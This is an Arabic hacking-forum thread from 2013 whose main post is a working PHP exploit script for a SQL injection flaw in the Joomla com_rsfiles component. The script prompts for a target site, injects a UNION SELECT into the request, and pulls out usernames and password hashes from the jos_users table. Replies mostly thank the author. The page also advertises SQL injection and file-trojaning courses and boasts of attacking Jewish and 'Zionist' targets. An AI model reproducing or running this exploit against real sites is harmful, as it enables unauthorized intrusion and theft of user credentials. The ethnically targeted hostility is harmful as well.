1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ خبر ] إستغلال لثغرة com_rsfiles في joomla

الموضوع في '[ ثــغـرات الأعــضــاء]' بواسطة Dr.HaMoOoD, بتاريخ ‏5 ديسمبر 2013.

كاتب الموضوع : Dr.HaMoOoD المشاهدات : 782 الردود : 5 ‏5 ديسمبر 2013
حالة الموضوع:
مغلق
  1. غير متصل

    Dr.HaMoOoD
    rank
    Developer

    عضو منذ:
    ‏17 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    اخترآق آجهزه آليهود
    الإقامة:

    بسم الله الرحمان الرحيم
    أنا قاعد فارغ وقت وجدت إحدى الثغرات في جملة و منتشرة في مواقع كثيرة لاكن الأستغلال خرطي
    فقمت بكتابة إستغلال بسيط للثغرة

    [​IMG]
    كود PHP:
     <?php
    $too 
    $argv[0];
    echo
    "
    **************************************************
    com_rsfiles POc Sql                              *
    found by I dont now but exploit by Dr.HaMoOoD    *             *
    my firend and my home iq-team.org                *
    dork ===
    **************************************************
     http://www.site.com >>>>>>>"
    ;
    $site1 trim(fgets(STDIN,1024));
            
    $itz = array();
       if(isset(
    $site1)) {
    echo
    "
    chek ==>
    $site1
     "
    ;
    $exploit '/index.php?option=com_rsfiles&view=files&layout=agreement&tmpl=component&cid=1/**/aNd/**/1=0/**/uNioN++sElecT+1,concat(0x47726f75705833,username,0x7c3a7c,password,0x47726f75705833)+from+jos_users--';
    $file = ($site1).($exploit);
    $get = @file_get_contents($file);
    if(
    $get) {
    preg_match("#GroupX3(.*?)GroupX3#" ,$get,$m);
    $all explode('|:|',$m[1]);
    $username $all[0];
    $password $all[1];
    echo 

    exploit DONE :
    username: 
    $username 
    password: 
    $password 
    \n
    "
    ;
     
            }else{echo
    "\n not VUn\n";};
            }
    ?> 
     


    جاري تحميل الصفحة...
  2. غير متصل

    ريلاكس ياقلبي
    Active DeveloPer

    عضو منذ:
    ‏12 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:

    رد: إستغلال لثغرة com_rsfiles في joomla

    الله يعطيك آلعآآفيةةة ...
     


  3. غير متصل

    أمير عرش الدموع
    DeveloPer Plus

    عضو منذ:
    ‏25 يناير 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    الإقامة:

    رد: إستغلال لثغرة com_rsfiles في joomla

    تسلم ايديك يابطل ..

    ربي يعطيك العافية والصحه يآرب
     


  4. غير متصل

    Just for you
    DeveloPer Plus

    عضو منذ:
    ‏3 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    4
    نقاط الجائزة:

    رد: إستغلال لثغرة com_rsfiles في joomla

    بارك الله فيك حبيبي ^:"
     


  5. غير متصل

    Dr.TaYeB
    rank
    Developer

    عضو منذ:
    ‏22 ديسمبر 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: إستغلال لثغرة com_rsfiles في joomla

    ممكن تشرح لينا كيفية الاستغلال للثغرة pir+_"te2
     


  6. غير متصل

    NETJOURNAL
    مشرف

    عضو منذ:
    ‏18 مايو 2006
    عدد المشاركات:
    الإعجابات المتلقاة:
    1,544
    نقاط الجائزة:
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:

    رد: إستغلال لثغرة com_rsfiles في joomla

    )5:")5:")5:")5:")5:")5:"
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...